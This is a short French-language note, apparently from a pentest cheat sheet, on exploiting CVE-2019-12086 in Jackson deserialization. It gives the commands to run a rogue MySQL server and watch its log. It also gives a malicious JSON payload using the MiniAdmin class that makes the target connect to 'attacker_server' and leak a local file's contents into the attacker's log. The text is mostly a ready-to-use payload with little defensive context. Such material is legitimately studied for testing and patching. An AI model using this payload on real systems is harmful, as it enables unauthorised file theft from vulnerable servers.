
jackson désérialisation
CVE-2019-12086 Désérialisation Jackson
python rogue_mysql_server.py
tail -f mysql.log
["com.mysql.cj.jdbc.admin.MiniAdmin","jdbc:mysql://attacker_server:port/foo"]
Lorsque Jackson désérialise la chaîne JSON malveillante, il se connecte au serveur MySQL malveillant et le contenu du fichier lu est écrit dans le mysql.log du serveur malveillant.